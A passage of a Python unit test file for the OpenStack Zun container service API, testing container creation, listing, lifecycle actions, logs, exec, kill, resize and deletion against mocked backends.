self.assertEqual(1, len(requested_networks))
self.assertEqual(fake_network['id'], requested_networks[0]['network'])
mock_create_volume.assert_called_once()
requested_volumes = \
mock_container_create.call_args[1]['requested_volumes']
self.assertEqual(1, len(requested_volumes))
self.assertEqual(fake_volume_id, requested_volumes[0].volume_id)
@patch('zun.network.neutron.NeutronAPI.get_available_network')
@patch('zun.compute.api.API.container_show')
@patch('zun.compute.api.API.container_create')
@patch('zun.compute.api.API.image_search')
def test_create_container_with_restart_policy_always_and_retrycount(
self,
mock_search,
mock_container_create,
mock_container_show,
mock_neutron_get_network):
mock_container_create.side_effect = lambda x, y, **z: y
# Create a container with a command
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512",'
'"restart_policy": {"Name": "always",'
'"MaximumRetryCount": "1"}}')
with self.assertRaisesRegex(
AppError, "maximum retry count not valid with"):
self.post('/v1/containers/',
params=params,
content_type='application/json')
self.assertTrue(mock_container_create.not_called)
mock_neutron_get_network.assert_called_once()
@patch('zun.compute.api.API.container_create')
@patch('zun.compute.api.API.image_search')
def test_create_container_invalid_long_name(self, mock_search,
mock_container_create):
# Long name
params = ('{"name": "' + 'i' * 256 + '", "image": "ubuntu",'
'"command": ["env"], "memory": "512"}')
self.assertRaises(AppError, self.post, '/v1/containers/',
params=params, content_type='application/json')
self.assertTrue(mock_container_create.not_called)
@patch('zun.objects.Container.list')
def test_get_all_containers(self, mock_container_list):
test_container = utils.get_test_container()
containers = [objects.Container(self.context, **test_container)]
mock_container_list.return_value = containers
response = self.get('/v1/containers/')
mock_container_list.assert_called_once_with(mock.ANY,
1000, None, 'id', 'asc',
filters={})
context = mock_container_list.call_args[0][0]
self.assertIs(False, context.all_projects)
self.assertEqual(200, response.status_int)
actual_containers = response.json['containers']
self.assertEqual(1, len(actual_containers))
self.assertEqual(test_container['uuid'],
actual_containers[0].get('uuid'))
self.assertNotIn('host', actual_containers[0])
@patch('zun.common.context.RequestContext.can')
@patch('zun.objects.Container.list')
def test_get_all_containers_by_admin(self, mock_container_list, mock_can):
mock_can.return_value = True
test_container = utils.get_test_container()
containers = [objects.Container(self.context, **test_container)]
mock_container_list.return_value = containers
response = self.get('/v1/containers/')
mock_container_list.assert_called_once_with(mock.ANY,
1000, None, 'id', 'asc',
filters={})
context = mock_container_list.call_args[0][0]
self.assertIs(False, context.all_projects)
self.assertEqual(200, response.status_int)
actual_containers = response.json['containers']
self.assertEqual(1, len(actual_containers))
self.assertEqual(test_container['uuid'],
actual_containers[0].get('uuid'))
self.assertIn('host', actual_containers[0])
@patch('zun.common.policy.enforce')
@patch('zun.objects.Container.list')
def test_get_all_containers_all_projects(self, mock_container_list,
mock_policy):
mock_policy.return_value = True
test_container = utils.get_test_container()
containers = [objects.Container(self.context, **test_container)]
mock_container_list.return_value = containers
response = self.get('/v1/containers/?all_projects=1')
mock_container_list.assert_called_once_with(mock.ANY,
1000, None, 'id', 'asc',
filters={})
context = mock_container_list.call_args[0][0]
self.assertIs(True, context.all_projects)
self.assertEqual(200, response.status_int)
actual_containers = response.json['containers']
self.assertEqual(1, len(actual_containers))
self.assertEqual(test_container['uuid'],
actual_containers[0].get('uuid'))
@patch('zun.objects.Container.list')
def test_get_all_has_status_reason_and_image_pull_policy(
self, mock_container_list):
test_container = utils.get_test_container()
containers = [objects.Container(self.context, **test_container)]
mock_container_list.return_value = containers
response = self.get('/v1/containers/')
self.assertEqual(200, response.status_int)
actual_containers = response.json['containers']
self.assertEqual(1, len(actual_containers))
self.assertEqual(test_container['uuid'],
actual_containers[0].get('uuid'))
self.assertIn('status_reason', actual_containers[0].keys())
self.assertIn('image_pull_policy', actual_containers[0].keys())
@patch('zun.objects.Container.list')
def test_get_all_containers_with_pagination_marker(self,
mock_container_list):
container_list = []
for id_ in range(4):
test_container = utils.create_test_container(
id=id_, uuid=uuidutils.generate_uuid(),
name='container' + str(id_), context=self.context)
container_list.append(objects.Container(self.context,
**test_container))
mock_container_list.return_value = container_list[-1:]
response = self.get('/v1/containers/?limit=3&marker=%s'
% container_list[2].uuid)
self.assertEqual(200, response.status_int)
actual_containers = response.json['containers']
self.assertEqual(1, len(actual_containers))
self.assertEqual(container_list[-1].uuid,
actual_containers[0].get('uuid'))
@patch('zun.objects.Container.list')
def test_get_all_containers_with_filter(self, mock_container_list):
test_container = utils.get_test_container()
containers = [objects.Container(self.context, **test_container)]
mock_container_list.return_value = containers
response = self.get('/v1/containers/?name=fake-name')
mock_container_list.assert_called_once_with(
mock.ANY, 1000, None, 'id', 'asc', filters={'name': 'fake-name'})
self.assertEqual(200, response.status_int)
actual_containers = response.json['containers']
self.assertEqual(1, len(actual_containers))
self.assertEqual(test_container['uuid'],
actual_containers[0].get('uuid'))
@patch('zun.objects.Container.list')
def test_get_all_containers_with_filter_disallow(
self, mock_container_list):
test_container = utils.get_test_container()
containers = [objects.Container(self.context, **test_container)]
mock_container_list.return_value = containers
response = self.get('/v1/containers/?host=fake-name',
expect_errors=True)
self.assertEqual(403, response.status_int)
self.assertEqual('application/json', response.content_type)
rule = 'container:get_one:host'
self.assertEqual(
"Policy doesn't allow %s to be performed." % rule,
response.json['errors'][0]['detail'])
@patch('zun.objects.Container.list')
def test_get_all_containers_with_unknown_parameter(
self, mock_container_list):
test_container = utils.get_test_container()
containers = [objects.Container(self.context, **test_container)]
mock_container_list.return_value = containers
response = self.get('/v1/containers/?unknown=fake-name',
expect_errors=True)
mock_container_list.assert_not_called()
self.assertEqual(400, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertEqual("Unknown parameters: unknown",
response.json['errors'][0]['detail'])
@patch('zun.objects.Container.list')
def test_get_all_containers_with_exception(self, mock_container_list):
test_container = utils.get_test_container()
containers = [objects.Container(self.context, **test_container)]
mock_container_list.return_value = containers
response = self.get('/v1/containers/')
mock_container_list.assert_called_once_with(mock.ANY,
1000, None, 'id', 'asc',
filters={})
self.assertEqual(200, response.status_int)
actual_containers = response.json['containers']
self.assertEqual(1, len(actual_containers))
self.assertEqual(test_container['uuid'],
actual_containers[0].get('uuid'))
@patch('zun.compute.api.API.container_show')
@patch('zun.objects.Container.get_by_uuid')
def test_get_one_by_uuid(self, mock_container_get_by_uuid,
mock_container_show):
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_container_get_by_uuid.return_value = test_container_obj
mock_container_show.return_value = test_container_obj
response = self.get('/v1/containers/%s/' % test_container['uuid'])
mock_container_get_by_uuid.assert_called_once_with(
mock.ANY,
test_container['uuid'])
context = mock_container_get_by_uuid.call_args[0][0]
self.assertIs(False, context.all_projects)
self.assertEqual(200, response.status_int)
self.assertEqual(test_container['uuid'],
response.json['uuid'])
self.assertNotIn('host', response.json)
@patch('zun.common.context.RequestContext.can')
@patch('zun.compute.api.API.container_show')
@patch('zun.objects.Container.get_by_uuid')
def test_get_one_by_admin(self, mock_container_get_by_uuid,
mock_container_show, mock_can):
mock_can.return_value = True
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_container_get_by_uuid.return_value = test_container_obj
mock_container_show.return_value = test_container_obj
response = self.get('/v1/containers/%s/' % test_container['uuid'])
mock_container_get_by_uuid.assert_called_once_with(
mock.ANY,
test_container['uuid'])
context = mock_container_get_by_uuid.call_args[0][0]
self.assertIs(False, context.all_projects)
self.assertEqual(200, response.status_int)
self.assertEqual(test_container['uuid'],
response.json['uuid'])
self.assertIn('host', response.json)
@patch('zun.common.policy.enforce')
@patch('zun.compute.api.API.container_show')
@patch('zun.objects.Container.get_by_uuid')
def test_get_one_by_uuid_all_projects(self, mock_container_get_by_uuid,
mock_container_show, mock_policy):
mock_policy.return_value = True
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_container_get_by_uuid.return_value = test_container_obj
mock_container_show.return_value = test_container_obj
response = self.get('/v1/containers/%s/?all_projects=1' %
test_container['uuid'])
mock_container_get_by_uuid.assert_called_once_with(
mock.ANY,
test_container['uuid'])
context = mock_container_get_by_uuid.call_args[0][0]
self.assertIs(True, context.all_projects)
self.assertEqual(200, response.status_int)
self.assertEqual(test_container['uuid'],
response.json['uuid'])
@patch('zun.objects.ComputeNode.get_by_name')
@patch('zun.compute.api.API.container_update')
@patch('zun.objects.Container.get_by_uuid')
def test_patch_by_uuid(self, mock_container_get_by_uuid, mock_update,
mock_computenode):
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_container_get_by_uuid.return_value = test_container_obj
mock_update.return_value = test_container_obj
test_host = utils.get_test_compute_node()
numa = objects.numa.NUMATopology._from_dict(test_host['numa_topology'])
test_host['numa_topology'] = numa
test_host_obj = objects.ComputeNode(self.context, **test_host)
mock_computenode.return_value = test_host_obj
params = {'cpu': 1}
container_uuid = test_container.get('uuid')
response = self.patch_json(
'/containers/%s/' % container_uuid,
params=params)
self.assertEqual(200, response.status_int)
self.assertTrue(mock_update.called)
self.assertNotIn('host', response.json)
@patch('zun.common.context.RequestContext.can')
@patch('zun.objects.ComputeNode.get_by_name')
@patch('zun.compute.api.API.container_update')
@patch('zun.objects.Container.get_by_uuid')
def test_patch_by_admin(self, mock_container_get_by_uuid, mock_update,
mock_computenode, mock_can):
mock_can.return_value = True
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_container_get_by_uuid.return_value = test_container_obj
mock_update.return_value = test_container_obj
test_host = utils.get_test_compute_node()
numa = objects.numa.NUMATopology._from_dict(test_host['numa_topology'])
test_host['numa_topology'] = numa
test_host_obj = objects.ComputeNode(self.context, **test_host)
mock_computenode.return_value = test_host_obj
params = {'cpu': 1}
container_uuid = test_container.get('uuid')
response = self.patch_json(
'/containers/%s/' % container_uuid,
params=params)
self.assertEqual(200, response.status_int)
self.assertTrue(mock_update.called)
self.assertIn('host', response.json)
def _action_test(self, test_container_obj, action, ident_field,
mock_container_action, status_code, query_param=''):
ident = test_container_obj.uuid
get_by_ident_loc = 'zun.objects.Container.get_by_%s' % ident_field
with patch(get_by_ident_loc) as mock_get_by_indent:
mock_get_by_indent.return_value = test_container_obj
response = self.post('/v1/containers/%s/%s/?%s' %
(ident, action, query_param))
self.assertEqual(status_code, response.status_int)
# Only PUT should work, others like GET should fail
self.assertRaises(AppError, self.get,
('/v1/containers/%s/%s/' %
(ident, action)))
if query_param:
value = query_param.split('=')[1]
mock_container_action.assert_called_once_with(
mock.ANY, test_container_obj, value)
else:
mock_container_action.assert_called_once_with(
mock.ANY, test_container_obj)
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_start')
def test_start_by_uuid(self, mock_container_start, mock_validate):
test_container_obj = objects.Container(self.context,
**utils.get_test_container())
self._action_test(test_container_obj, 'start', 'uuid',
mock_container_start, 202)
def test_start_by_uuid_invalid_state(self):
uuid = uuidutils.generate_uuid()
test_object = utils.create_test_container(context=self.context,
uuid=uuid, status='Running')
with self.assertRaisesRegex(
AppError, "Cannot start container %s in Running state" % uuid):
self.post('/v1/containers/%s/%s/' % (test_object.uuid,
'start'))
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_stop')
def test_stop_by_uuid(self, mock_container_stop, mock_validate):
test_container_obj = objects.Container(self.context,
**utils.get_test_container())
self._action_test(test_container_obj, 'stop', 'uuid',
mock_container_stop, 202,
query_param='timeout=10')
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_stop')
def test_stop_by_name_invalid_timeout_value(self,
mock_container_stop,
mock_validate):
test_container_obj = objects.Container(self.context,
**utils.get_test_container())
with self.assertRaisesRegex(AppError,
"Invalid input for query parameters"):
self._action_test(test_container_obj, 'stop', 'name',
mock_container_stop, 202,
query_param='timeout=xyz')
def test_stop_by_uuid_invalid_state(self):
uuid = uuidutils.generate_uuid()
test_object = utils.create_test_container(context=self.context,
uuid=uuid, status='Stopped')
with self.assertRaisesRegex(
AppError, "Cannot stop container %s in Stopped state" % uuid):
self.post('/v1/containers/%s/%s/' % (test_object.uuid,
'stop'))
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_pause')
def test_pause_by_uuid(self, mock_container_pause, mock_validate):
test_container_obj = objects.Container(self.context,
**utils.get_test_container())
self._action_test(test_container_obj, 'pause', 'uuid',
mock_container_pause, 202)
def test_pause_by_uuid_invalid_state(self):
uuid = uuidutils.generate_uuid()
test_object = utils.create_test_container(context=self.context,
uuid=uuid, status='Stopped')
with self.assertRaisesRegex(
AppError, "Cannot pause container %s in Stopped state" % uuid):
self.post('/v1/containers/%s/%s/' % (test_object.uuid,
'pause'))
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_unpause')
def test_unpause_by_uuid(self, mock_container_unpause, mock_validate):
test_container_obj = objects.Container(self.context,
**utils.get_test_container())
self._action_test(test_container_obj, 'unpause', 'uuid',
mock_container_unpause, 202)
def test_unpause_by_uuid_invalid_state(self):
uuid = uuidutils.generate_uuid()
test_object = utils.create_test_container(context=self.context,
uuid=uuid, status='Running')
with self.assertRaisesRegex(
AppError,
"Cannot unpause container %s in Running state" % uuid):
self.post('/v1/containers/%s/%s/' % (test_object.uuid,
'unpause'))
@patch('zun.compute.api.API.container_rebuild')
@patch('zun.common.policy.enforce')
def test_rebuild_container(self, mock_policy, mock_rebuild):
mock_policy.return_value = True
uuid = uuidutils.generate_uuid()
utils.create_test_container(context=self.context,
uuid=uuid, name="container")
url = '/v1/containers/%s/rebuild' % uuid
response = self.post(url)
self.assertEqual(202, response.status_int)
mock_rebuild.assert_called_once()
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_reboot')
def test_reboot_by_uuid(self, mock_container_reboot, mock_validate):
test_container_obj = objects.Container(self.context,
**utils.get_test_container())
with patch.object(test_container_obj, 'save') as mock_save:
self._action_test(test_container_obj, 'reboot', 'uuid',
mock_container_reboot, 202,
query_param='timeout=10')
mock_save.assert_called_once()
def test_reboot_by_uuid_invalid_state(self):
uuid = uuidutils.generate_uuid()
test_object = utils.create_test_container(context=self.context,
uuid=uuid, status='Paused')
with self.assertRaisesRegex(
AppError, "Cannot reboot container %s in Paused state" % uuid):
self.post('/v1/containers/%s/%s/' % (test_object.uuid,
'reboot'))
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_reboot')
def test_reboot_by_name_wrong_timeout_value(self, mock_container_reboot,
mock_validate):
test_container_obj = objects.Container(self.context,
**utils.get_test_container())
with self.assertRaisesRegex(AppError,
"Invalid input for query parameters"):
self._action_test(test_container_obj, 'reboot', 'name',
mock_container_reboot, 202,
query_param='timeout=xyz')
@patch('zun.compute.api.API.container_logs')
@patch('zun.objects.Container.get_by_uuid')
def test_get_logs_by_uuid(self, mock_get_by_uuid, mock_container_logs):
mock_container_logs.return_value = "test"
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
response = self.get('/v1/containers/%s/logs/' % container_uuid)
self.assertEqual(200, response.status_int)
mock_container_logs.assert_called_once_with(
mock.ANY, test_container_obj, True, True, False, 'all', None)
@patch('zun.compute.api.API.container_logs')
@patch('zun.objects.Container.get_by_uuid')
def test_get_logs_with_options_by_uuid(self, mock_get_by_uuid,
mock_container_logs):
mock_container_logs.return_value = "test"
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
response = self.get(
'/v1/containers/%s/logs?stderr=True&stdout=True'
'×tamps=False&tail=1&since=100000000' % container_uuid)
self.assertEqual(200, response.status_int)
mock_container_logs.assert_called_once_with(
mock.ANY, test_container_obj, True, True, False, '1', '100000000')
@patch('zun.compute.api.API.container_logs')
@patch('zun.objects.Container.get_by_uuid')
def test_get_logs_put_fails(self, mock_get_by_uuid, mock_container_logs):
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
self.assertRaises(AppError, self.post,
'/v1/containers/%s/logs/' % container_uuid)
self.assertFalse(mock_container_logs.called)
@patch('zun.compute.api.API.container_logs')
@patch('zun.objects.Container.get_by_uuid')
def test_get_logs_with_invalid_since(self, mock_get_by_uuid,
mock_container_logs):
invalid_sinces = ['x11', '11x', '2000-01-01 01:01:01']
for value in invalid_sinces:
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context,
**test_container)
mock_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
params = {'since': value}
self.assertRaises(AppError, self.post,
'/v1/containers/%s/logs' %
container_uuid, params)
self.assertFalse(mock_container_logs.called)
def test_get_logs_with_invalid_state(self):
uuid = uuidutils.generate_uuid()
test_object = utils.create_test_container(context=self.context,
uuid=uuid, status='Creating')
with self.assertRaisesRegex(
AppError,
"Cannot logs container %s in Creating state" % uuid):
self.get('/v1/containers/%s/logs/' % test_object.uuid)
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_exec')
@patch('zun.objects.Container.get_by_uuid')
def test_execute_command_by_uuid(self, mock_get_by_uuid,
mock_container_exec, mock_validate):
mock_container_exec.return_value = ""
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
url = '/v1/containers/%s/%s/' % (container_uuid, 'execute')
cmd = {'command': 'ls'}
response = self.post(url, cmd)
self.assertEqual(200, response.status_int)
mock_container_exec.assert_called_once_with(
mock.ANY, test_container_obj, cmd['command'], True, False)
def test_exec_command_by_uuid_invalid_state(self):
uuid = uuidutils.generate_uuid()
test_object = utils.create_test_container(context=self.context,
uuid=uuid, status='Stopped')
cmd = {'command': 'ls'}
with self.assertRaisesRegex(
AppError,
"Cannot execute container %s in Stopped state" % uuid):
self.post('/v1/containers/%s/%s/' % (test_object.uuid,
'execute'), cmd)
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_exec')
@patch('zun.objects.Container.get_by_uuid')
def test_execute_without_command_by_uuid(self, mock_get_by_uuid,
mock_container_exec,
mock_validate):
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
cmd = {'command': ''}
self.assertRaises(AppError, self.post,
'/v1/containers/%s/execute' %
container_uuid, cmd)
self.assertFalse(mock_container_exec.called)
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_delete')
@patch('zun.objects.Container.get_by_uuid')
def test_delete_container_by_uuid(self, mock_get_by_uuid,
mock_container_delete, mock_validate):
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
response = self.delete('/v1/containers/%s/' % container_uuid)
self.assertEqual(204, response.status_int)
mock_container_delete.assert_called_once_with(
mock.ANY, test_container_obj, False)
context = mock_container_delete.call_args[0][0]
self.assertIs(False, context.all_projects)
@patch('zun.common.policy.enforce')
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_delete')
@patch('zun.objects.Container.get_by_uuid')
def test_delete_container_by_uuid_all_projects(self, mock_get_by_uuid,
mock_container_delete,
mock_validate, mock_policy):
mock_policy.return_value = True
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
response = self.delete('/v1/containers/%s/?all_projects=1' %
container_uuid)
self.assertEqual(204, response.status_int)
mock_container_delete.assert_called_once_with(
mock.ANY, test_container_obj, False)
context = mock_container_delete.call_args[0][0]
self.assertIs(True, context.all_projects)
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_stop')
@patch('zun.compute.api.API.container_delete')
@patch('zun.objects.Container.get_by_uuid')
def test_delete_container_by_uuid_with_stop(self, mock_get_by_uuid,
mock_container_stop,
mock_container_delete,
mock_validate):
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
response = self.delete('/v1/containers/%s?stop=True' %
container_uuid)
self.assertEqual(204, response.status_int)
def test_delete_by_uuid_invalid_state(self):
uuid = uuidutils.generate_uuid()
test_object = utils.create_test_container(context=self.context,
uuid=uuid, status='Running')
with self.assertRaisesRegex(
AppError,
"Cannot delete container %s in Running state" % uuid):
self.delete('/v1/containers/%s' % (test_object.uuid))
@patch('zun.common.policy.enforce')
def test_delete_force_by_uuid_invalid_state(self, mock_policy):
mock_policy.return_value = True
uuid = uuidutils.generate_uuid()
test_object = utils.create_test_container(context=self.context,
uuid=uuid, status='Paused')
with self.assertRaisesRegex(
AppError,
"Cannot delete_force container %s in Paused state" % uuid):
self.delete('/v1/containers/%s?force=True' % test_object.uuid)
@patch('zun.common.policy.enforce')
@patch('zun.compute.api.API.container_delete')
def test_delete_by_uuid_invalid_state_force_true(self, mock_delete,
mock_policy):
mock_policy.return_value = True
uuid = uuidutils.generate_uuid()
test_object = utils.create_test_container(context=self.context,
uuid=uuid, status='Running')
response = self.delete('/v1/containers/%s?force=True' % (
test_object.uuid))
self.assertEqual(204, response.status_int)
@patch('zun.compute.api.API.container_delete')
def test_delete_by_uuid_with_force_wrong(self, mock_delete):
uuid = uuidutils.generate_uuid()
test_object = utils.create_test_container(context=self.context,
uuid=uuid)
mock_delete.side_effect = exception.InvalidValue
self.assertRaises(AppError, self.delete,
'/v1/containers/%s?force=wrong' % test_object.uuid)
self.assertTrue(mock_delete.not_called)
def test_delete_container_with_uuid_not_found(self):
uuid = uuidutils.generate_uuid()
self.assertRaises(AppError, self.delete,
'/v1/containers/%s' % uuid)
@patch('zun.objects.Container.destroy')
@patch('zun.common.utils.validate_container_state')
@patch('zun.objects.Container.get_by_uuid')
def test_delete_container_without_host(self, mock_get_by_uuid,
mock_validate, mock_destroy):
test_container = utils.get_test_container(host="")
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
response = self.delete('/v1/containers/%s/' % container_uuid)
self.assertEqual(204, response.status_int)
mock_validate.assert_called_once()
mock_destroy.assert_called_once()
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_kill')
@patch('zun.objects.Container.get_by_uuid')
def test_kill_container_by_uuid(self,
mock_get_by_uuid, mock_container_kill,
mock_validate):
test_container_obj = objects.Container(self.context,
**utils.get_test_container())
mock_container_kill.return_value = test_container_obj
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
url = '/v1/containers/%s/%s/' % (container_uuid, 'kill')
cmd = {'signal': '9'}
response = self.post(url, cmd)
self.assertEqual(202, response.status_int)
mock_container_kill.assert_called_once_with(
mock.ANY, test_container_obj, cmd['signal'])
def test_kill_by_uuid_invalid_state(self):
uuid = uuidutils.generate_uuid()
test_object = utils.create_test_container(context=self.context,
uuid=uuid, status='Stopped')
body = {'signal': 9}
with self.assertRaisesRegex(
AppError, "Cannot kill container %s in Stopped state" % uuid):
self.post('/v1/containers/%s/%s/' % (test_object.uuid,
'kill'), body)
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_kill')
@patch('zun.objects.Container.get_by_uuid')
def test_kill_container_which_not_exist(self,
mock_get_by_uuid,
mock_container_kill,
mock_validate):
mock_container_kill.return_value = ""
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
mock_container_kill.side_effect = Exception
container_uuid = "edfe2a25-2901-438d-8157-fffffd68d051"
self.assertRaises(AppError, self.post,
'/v1/containers/%s/%s/' % (container_uuid, 'kill'))
self.assertTrue(mock_container_kill.called)
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_kill')
@patch('zun.objects.Container.get_by_uuid')
def test_kill_container_with_exception(self,
mock_get_by_uuid,
mock_container_kill,
mock_validate):
mock_container_kill.return_value = ""
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
mock_container_kill.side_effect = Exception
container_uuid = test_container.get('uuid')
self.assertRaises(AppError, self.post,
'/v1/containers/%s/%s/' % (container_uuid, 'kill'))
self.assertTrue(mock_container_kill.called)
@patch('zun.compute.api.API.container_kill')
@patch('zun.objects.Container.get_by_uuid')
def test_kill_container_with_invalid_singal(self,
mock_get_by_uuid,
mock_container_kill):
invalid_signal = ['11x', 'x11']
for value in invalid_signal:
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context,
**test_container)
mock_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
params = {'signal': value}
with self.assertRaisesRegex(
AppError, "Bad response: 400 Bad Request"):
self.post('/v1/containers/%s/kill/' %
container_uuid, params)
self.assertFalse(mock_container_kill.called)
@patch('zun.network.neutron.NeutronAPI.get_available_network')
@patch('zun.compute.api.API.container_create')
@patch('zun.compute.api.API.image_search')
def test_create_container_resp_has_image_driver(self, mock_search,
mock_container_create,
mock_neutron_get_network):
mock_container_create.side_effect = lambda x, y, **z: y
# Create a container with a command
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512",'
'"environment": {"key1": "val1", "key2": "val2"},'
'"image_driver": "glance"}')
response = self.post('/v1/containers/',
params=params,
content_type='application/json')
self.assertEqual(202, response.status_int)
self.assertIn('image_driver', response.json.keys())
self.assertEqual('glance', response.json.get('image_driver'))
@patch('zun.compute.api.API.container_attach')
@patch('zun.objects.Container.get_by_uuid')
def test_attach_container_by_uuid(self, mock_get_by_uuid,
mock_container_attach):
mock_container_attach.return_value = "ws://test"
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context,
**test_container)
mock_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
response = self.get('/v1/containers/%s/attach/' % container_uuid)
self.assertEqual(200, response.status_int)
mock_container_attach.assert_called_once_with(
mock.ANY, test_container_obj)
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_attach')
@patch('zun.objects.Container.get_by_uuid')
def test_attach_container_with_exception(self,
mock_get_by_uuid,
mock_container_attach,
mock_validate):
mock_container_attach.return_value = ""
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
mock_container_attach.side_effect = Exception
container_uuid = test_container.get('uuid')
self.assertRaises(AppError, self.get,
'/v1/containers/%s/attach/' % container_uuid)
self.assertTrue(mock_container_attach.called)
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_resize')
@patch('zun.objects.Container.get_by_name')
def test_resize_by_uuid(self, mock_get_by_uuid, mock_container_resize,
mock_validate):
test_container_obj = objects.Container(self.context,
**utils.get_test_container())
mock_container_resize.return_value = test_container_obj
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
container_name = test_container.get('name')
url = '/v1/containers/%s/%s/' % (container_name, 'resize')
cmd = {'h': '100', 'w': '100'}
response = self.post(url, cmd)
self.assertEqual(200, response.status_int)
mock_container_resize.assert_called_once_with(
mock.ANY, test_container_obj, cmd['h'], cmd['w'])
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_resize')
@patch('zun.objects.Container.get_by_uuid')
def test_resize_with_exception(self, mock_get_by_uuid,
mock_container_resize, mock_validate):
mock_container_resize.return_value = ""
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
mock_container_resize.side_effect = Exception
container_uuid = test_container.get('uuid')
body = {'h': '100', 'w': '100'}
self.assertRaises(AppError, self.post,
'/v1/containers/%s/%s/' %
(container_uuid, 'resize'), body)
self.assertTrue(mock_container_resize.called)
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.resize_container')
@patch('zun.objects.Container.get_by_name')
def test_resize_container(self, mock_get_by_uuid,
mock_resize_container, mock_validate):
test_container_obj = objects.Container(self.context,
**utils.get_test_container())
mock_resize_container.return_value = test_container_obj
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
container_name = test_container.get('name')
url = '/v1/containers/%s/resize_container/' % container_name
params = {'cpu': 1, 'memory': '512'}
response = self.post(url, params)
self.assertEqual(202, response.status_int)
mock_resize_container.assert_called_once_with(
mock.ANY, test_container_obj, params)
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_top')
@patch('zun.objects.Container.get_by_uuid')
def test_top_command_by_uuid(self, mock_get_by_uuid,
mock_container_top, mock_validate):
mock_container_top.return_value = ""
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
container_uuid = test_container.get('uuid')
response = self.get('/v1/containers/%s/top?ps_args=aux' %
container_uuid)
self.assertEqual(200, response.status_int)
self.assertTrue(mock_container_top.called)
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_top')
@patch('zun.objects.Container.get_by_uuid')
def test_top_command_invalid_ps(self, mock_get_by_uuid,
mock_container_top, mock_validate):
mock_container_top.return_value = ""
test_container = utils.get_test_container()
test_container_obj = objects.Container(self.context, **test_container)
mock_get_by_uuid.return_value = test_container_obj
mock_container_top.side_effect = Exception
container_uuid = test_container.get('uuid')
self.assertRaises(AppError, self.get,
'/v1/containers/%s/top?ps_args=kkkk' %
container_uuid)
self.assertTrue(mock_container_top.called)
@patch('zun.common.utils.validate_container_state')
@patch('zun.compute.api.API.container_get_archive')
@patch('zun.objects.Container.get_by_uuid')
